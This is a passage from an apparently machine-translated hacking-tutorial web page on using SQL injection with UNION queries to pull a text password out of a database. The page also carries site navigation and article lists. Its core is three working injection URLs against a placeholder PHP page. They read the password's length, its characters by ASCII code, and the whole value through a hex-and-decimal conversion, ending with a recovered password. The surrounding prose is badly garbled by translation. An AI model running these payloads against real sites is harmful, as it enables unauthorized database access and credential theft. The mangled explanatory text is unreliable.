Home | hacker invade | crack analyzes | hacker course | Exploit | encryption decipher | network management | System crack | the virus to be related | invades the examination | firewall
You are here: hacking technology > hacker course > Content
Hot Articles
SmoothWall Introduces Lo
Travel of the JSP+Oracle
Hacker skill: Gains Webs
Breaks through the Inter
MYSQL database injection
The Tomcat backstage tak
Breaks through the Inter
The hacker teaches you a
WinHex pursues the code
How does the hacker dest
How teaches you to take
The SQL injection revise
mssql SA jurisdiction ne
Microsoft SQL Server SA
The bored Css cross stat
Recommend Articles
The SQL injection revise
How does the hacker dest
The new military recruit
Union inquires the small
MYSQL database injection
Invades under new skill
How does the website scr
Smells searches works as
How in does the net seep
Microsoft SQL Server SA
A simple invasion, does
The mainstream raises th
The bored Css cross stat
The random combined comm
The hacker teaches you a
New Articles
Check Point offers compa
The malware spreads Cali
Full Disk Encryption pro
Cardholders should take
U.S. still more spam tha
Strong encryption L?solu
ConvexSoft DJ Audio Mixe
Few companies k?can be i
IT professionals can kee
k the media?can not by s
k the media?can not by s
Google Custom Search Eng
Users of the iPhone and
Gateshead College offers
Manchester obtained pass
Union inquires the small skill(2)
  Add date: 07/09/2008   Publishing date: 07/09/2008   Hits: 24
Total 2 pages, Current page:2, Jump to page:
 

Not only everybody knows in the union inquiry around the enumeration must be equal, the type must be the same. Then pours into this hits the mark, the preceding inquiry returns value type should be a digit, but we, if wants to use the union inquiry to obtain the type is text password, how should manage?
Actually we may find out the password length first:

http://www.hacker.com/test.php?id=1%20and%201=2%20union%20select%20length(password)%20from%20test%23

The returns result is 8. OK, comes again:

http://www.hacker.com/test.php?id=1%20and%201=2%20union%20select%20ascii(mid(password,1,1))%20from%20test

The returns result is the password first ASCII code value, then looked up each on OK.
However we have a more convenient method actually, heh heh, an inquiry sufficed.
We submit:

http://www.hacker.com/test.php?id=1%20and%201=2%20union%20select%20conv(hex(password),16,10)%20from%20test

Returns 7017854418938247224. The transformation is 16 enters the system is 0x61646D696E383838, it is “admin888” 16 systems. , The principle did not say, believed that everybody “raised second is the egg”.
In the test does not need the conv function to transform the type to meet does not match, the perspiration, does not know the reason.
Ok! Talked nonsense finishes.



 
Other pages: : <<Prev * 1 * 2
Prev:The new military recruits take WebShell the experience Next:MYSQL database injection essence

Comment:

Category: Home > hacker course
Home